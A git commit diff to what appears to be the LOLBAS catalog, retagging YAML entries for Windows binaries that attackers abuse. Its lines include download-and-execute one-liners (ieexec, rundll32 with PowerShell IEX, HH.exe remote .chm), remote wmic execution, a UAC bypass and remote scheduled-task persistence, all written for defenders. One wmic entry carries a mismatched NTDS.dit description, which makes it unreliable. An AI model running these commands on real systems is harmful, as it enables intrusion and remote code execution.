Various changes to Execute tags

This commit is contained in:
Wietze 2024-11-20 23:08:37 +00:00
parent ab3ea8ff63
commit 089614e6a9
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
52 changed files with 86 additions and 100 deletions

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetObjets - Execute: .NetObjects
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1053.002 MitreID: T1053.002
OperatingSystem: Windows 7 or older OperatingSystem: Windows 7 or older
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\System32\At.exe
- Path: C:\WINDOWS\SysWOW64\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe

View File

@ -22,6 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: INF - Execute: INF
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: "conhost.exe --headless calc.exe" - Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable) Usecase: Specify --headless parameter to hide child process window (if applicable)
@ -21,7 +21,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\conhost.exe - Path: c:\windows\system32\conhost.exe
Detection: Detection:

View File

@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: .NetObjects
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe

View File

@ -11,8 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: HH.exe c:\windows\system32\calc.exe Tags:
Description: Executes calc.exe with HTML Help. - Execute: EXE
- Application: GUI
Usecase: Execute process with HH.exe Usecase: Execute process with HH.exe
Category: Execute Category: Execute
Privileges: User Privileges: User
@ -20,7 +21,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: HH.exe http://some.url/payload.chm - Application: GUI
Description: Executes a remote payload.chm file which can contain commands. Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe Usecase: Execute commands with HH.exe
Category: Execute Category: Execute

View File

@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: Remote - Execute: Remote
- Execute: .NetEXE - Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location Usecase: Download and run attacker code from remote location
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: Remote - Execute: Remote
- Execute: .NetEXE - Execute: EXE (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Execute: .NetEXE - Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
@ -22,8 +22,8 @@ Commands:
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Execute: .NetEXE - Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload - Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache. Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: JScript
- Command: jsc.exe /t:library Library.js - Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: JScript
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe

View File

@ -22,8 +22,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10S, Windows 11 OperatingSystem: Windows 10S, Windows 11
Tags: Tags:
- Execute: VB.Net - Execute: XOML
- Execute: Csharp
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code Usecase: Compile and run code
@ -32,8 +31,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10S, Windows 11 OperatingSystem: Windows 10S, Windows 11
Tags: Tags:
- Execute: VB.Net - Execute: XOML
- Execute: Csharp
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.014 MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Command: mmc.exe gpedit.msc - Command: mmc.exe gpedit.msc
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
@ -20,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218.014 MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: Csharp - Execute: CSharp
- Command: msbuild.exe project.csproj - Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file. Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code Usecase: Compile and run code
@ -21,7 +21,7 @@ Commands:
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: Csharp - Execute: CSharp
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export Description: Executes generated Logger DLL file with TargetLogger export
Usecase: Execute DLL Usecase: Execute DLL
@ -39,7 +39,7 @@ Commands:
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: XSL
- Command: msbuild.exe @sample.rsp - Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections Usecase: Bypass command-line based detections

View File

@ -51,6 +51,8 @@ Commands:
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: MSI
- Execute: MST
- Execute: Remote - Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: regasm.exe /U AllTheThingsx64.dll - Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function. Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function. Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe

View File

@ -22,15 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Execute: Remote
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution Usecase: Proxy execution
@ -40,15 +32,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: JScript - Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet Usecase: Execute code from Internet
@ -75,8 +58,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation Usecase: Create a remote task to run daily relative to the the time of creation
@ -21,7 +21,7 @@ Commands:
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\schtasks.exe - Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019 OperatingSystem: Windows 10 1809, Windows Server 2019
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe . - Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -21,7 +21,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe - Path: c:\windows\system32\OpenSSH\ssh.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.012 MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
Full_Path: Full_Path:
- Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system. Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system Usecase: Execute binary on a remote system
@ -30,7 +30,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Execute: Remote - Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied. Description: Create a volume shadow copy of NTDS.dit that can be copied.

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures Usecase: Run a com object created in registry to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -30,7 +30,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 11 OperatingSystem: Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: URL
Full_Path: Full_Path:
- Path: c:\windows\system32\ieframe.dll - Path: c:\windows\system32\ieframe.dll
- Path: c:\windows\syswow64\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: URL
Full_Path: Full_Path:
- Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\system32\shdocvw.dll
- Path: c:\windows\syswow64\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll

View File

@ -21,7 +21,7 @@ Commands:
